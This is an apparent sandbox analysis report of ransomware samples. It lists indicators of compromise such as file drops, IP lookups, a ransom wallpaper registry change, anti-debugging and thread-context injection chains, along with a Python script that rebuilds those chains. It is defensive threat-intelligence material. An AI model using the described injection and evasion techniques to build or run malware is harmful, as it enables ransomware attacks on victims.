File opened (read-only) \??\E: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\G: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\B: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\T: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\R: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\X: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened 
(read-only) \??\V: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\M: taskmgr.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\F: Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe File opened (read-only) \??\T: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\L: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\Y: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\V: 
Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\J: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\M: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\A: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\N: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\Z: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\M: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\W: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\E: 
UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\O: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe -
Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 93: api.ipify.org
flow 139: api.ipify.org
flow 140: ip-api.com

Drops file in System32 directory (25 IoCs)
description | ioc | Process
File created | C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.ppt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File created | C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File created | C:\Windows\SysWOW64\@AppHelpToast.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\@AudioToastIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\@WirelessDisplayToast.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\SecurityAndMaintenance_Error.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\WindowsCodecsRaw.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File created | C:\Windows\SysWOW64\SecurityAndMaintenance_Alert.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File created | C:\Windows\SysWOW64\@EnrollmentToastIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\@VpnToastIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\DefaultAccountTile.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File opened for modification | C:\Windows\SysWOW64\hra8.dll | ditziw.exe
File created | C:\Windows\SysWOW64\SecurityAndMaintenance.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\Bthprops\@BthpropsNotificationLogo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.xls | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
The new wallpaper is a bitmap the sample itself wrote to the user's Temp directory, the usual way ransomware puts its demand on screen once encryption is done.
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" | Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid | Process
8248 | UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe
6232 | UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe
5656 | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
5656 | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
5656 | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
-
Suspicious use of SetThreadContext 8 IoCs
description | pid | Process | procid_target
PID 440 set thread context of 4972 | 440 | Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe | 122
PID 4972 set thread context of 4780 | 4972 | Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe | 132
PID 4780 set thread context of 2788 | 4780 | svchost.exe | 137
PID 2432 set thread context of 3616 | 2432 | Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe | 167
PID 6044 set thread context of 5152 | 6044 | AVShieldPro.exe | 172
PID 3920 set thread context of 6376 | 3920 | Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe | 184
PID 2860 set thread context of 9180 | 2860 | Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe | 194
PID 1088 set thread context of 5732 | 1088 | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe | 227
-
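The eight rows above describe chains rather than eight independent events: a PID that is the target of one row reappears as the source of the next (440 injects into 4972, 4972 into 4780, and 4780, now svchost.exe, into 2788). The Python below is an added example, not part of this report or of the sandbox's own rules, that parses the rows as the table prints them and follows source-to-target edges from every root PID to rebuild each chain. ROWS is copied from the table; the procid_target column is a row index in the report's process list rather than a PID, so it is carried along but not used for linking. A PID is only named on the source side of a row, so the last hop of the longest chain (2788) has no image name in this table and is reported as such.

```python
"""Reconstruct SetThreadContext injection chains from a sandbox signature table.
Added example: ROWS is copied from the report's table; the graph walk is this
example's own logic, not the sandbox's."""
import re
from collections import defaultdict

# (description, pid, Process, procid_target) exactly as the table lists them.
ROWS = [
    ("PID 440 set thread context of 4972", 440,
     "Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe", 122),
    ("PID 4972 set thread context of 4780", 4972,
     "Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe", 132),
    ("PID 4780 set thread context of 2788", 4780, "svchost.exe", 137),
    ("PID 2432 set thread context of 3616", 2432,
     "Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe", 167),
    ("PID 6044 set thread context of 5152", 6044, "AVShieldPro.exe", 172),
    ("PID 3920 set thread context of 6376", 3920,
     "Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe", 184),
    ("PID 2860 set thread context of 9180", 2860,
     "Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe", 194),
    ("PID 1088 set thread context of 5732", 1088,
     "HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe", 227),
]

EDGE = re.compile(r"^PID (\d+) set thread context of (\d+)$")
UNKNOWN = "<image not in table>"


def parse_edges(rows):
    """Return (names, edges): pid -> image name, source pid -> [target pids]."""
    names, edges = {}, defaultdict(list)
    for desc, pid, image, _row_index in rows:
        m = EDGE.match(desc)
        if not m:
            raise ValueError(f"unexpected description: {desc!r}")
        src, dst = int(m.group(1)), int(m.group(2))
        if src != pid:
            raise ValueError(f"description PID {src} disagrees with pid column {pid}")
        names[src] = image          # the source side is the only place the table names a PID
        edges[src].append(dst)
    return names, edges


def injection_chains(rows):
    """Follow source->target edges from every root (a PID that is never a target)."""
    names, edges = parse_edges(rows)
    targets = {t for ts in edges.values() for t in ts}
    chains = []

    def walk(pid, path, seen):
        if pid in seen:             # a cyclic table would otherwise recurse forever
            chains.append(path + [(pid, "<cycle>")])
            return
        path = path + [(pid, names.get(pid, UNKNOWN))]
        if pid not in edges:        # leaf: this PID injects into nobody
            chains.append(path)
            return
        for nxt in edges[pid]:
            walk(nxt, path, seen | {pid})

    for root in sorted(set(edges) - targets):
        walk(root, [], frozenset())
    return chains


def format_chain(chain):
    return " -> ".join(f"{pid}:{image}" for pid, image in chain)


if __name__ == "__main__":
    for chain in injection_chains(ROWS):
        print(format_chain(chain))
```

Run stand-alone it prints six chains, five of one hop and one of three hops ending in a PID the table never names. PID 9180, the target of the Foreign.ogrt row, is also the process whose memory region at 0x400000 matches the UPX rule in the yara table that follows; a hollowed child whose image base now holds a packed payload looks exactly like that.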
resource | yara_rule
behavioral1/memory/1080-330-0x0000000000400000-0x000000000052E000-memory.dmp | upx
behavioral1/files/0x0007000000023c97-321.dat | upx
behavioral1/memory/1080-1237-0x0000000000400000-0x000000000052E000-memory.dmp | upx
behavioral1/memory/9180-2317-0x0000000000400000-0x000000000045D000-memory.dmp | upx
behavioral1/memory/9180-4151-0x0000000000400000-0x000000000045D000-memory.dmp | upx
-
Drops file in Program Files directory 64 IoCs
description | ioc | Process
File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\localhost.crt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\ThankYou\GenericEnglish-1.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover_2x.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\download-btn.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\154.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\175.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\thumb_animation.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W6.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\Assets\ValueProp_Unknown.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\logo_retina.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\MixerBranding\mixer_logo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\8041_40x40x32.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\ellipsis_16x16x32.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\VideoLAN\VLC\NEWS.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\6.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\skype-logo-40.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\faf_icons.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons2x.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\0.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\IncomingCallBrandingImage.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\2876_20x20x32.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\LightGray.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\video.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\LiveTiles\avatar310x310.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
